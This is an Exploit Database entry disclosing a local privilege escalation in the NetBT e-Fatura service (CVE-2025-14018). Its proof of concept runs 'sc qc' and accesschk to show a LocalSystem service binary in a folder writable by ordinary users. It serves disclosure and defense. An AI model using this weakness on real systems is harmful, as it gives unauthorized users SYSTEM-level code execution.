[local] NetBT e-Fatura - Privilege Escalation

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING NetBT e-Fatura - Privilege Escalation EDB-ID: 52509 CVE: 2025-14018 EDB Verified: Author: SECCOPS Type: LOCAL Exploit:   /   Platform: MULTIPLE Date: 2026-04-10 Vulnerable App: # Exploit Title: NetBT e-Fatura - Privilege Escalation # Author: Seccops # Discovery Date: 2025-10-03 # Vendor: https://net-bt.com.tr/e-fatura/ # Tested Version: 2024 # Tested on OS: Microsoft Windows Server 2019 DC # Vulnerability Type: CWE-428 Unquoted Search Path or Element # CVE: CVE-2025-14018 Note: Thanks "Levent Sungu" for providing the testing environment. ==================== Description & Impact ==================== This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system. ================ Proof of Concept ================ C:\Users\efatura>sc qc InboxProcessor [SC] QueryServiceConfig SUCCESS SERVICE_NAME: InboxProcessor TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : InboxProcessor DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\" Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com C:\inetpub\wwwroot\InboxProcessor RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services